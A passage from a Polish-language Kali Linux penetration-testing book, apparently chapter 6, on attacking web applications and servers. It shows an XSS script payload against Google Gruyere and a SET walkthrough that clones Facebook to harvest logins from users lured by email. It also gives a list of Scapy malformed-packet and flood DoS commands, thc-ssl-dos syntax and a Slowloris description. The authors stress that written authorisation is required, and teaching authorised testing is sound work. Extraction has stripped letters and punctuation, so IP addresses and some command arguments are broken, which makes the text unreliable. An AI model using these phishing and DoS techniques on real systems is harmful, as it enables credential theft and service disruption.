OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
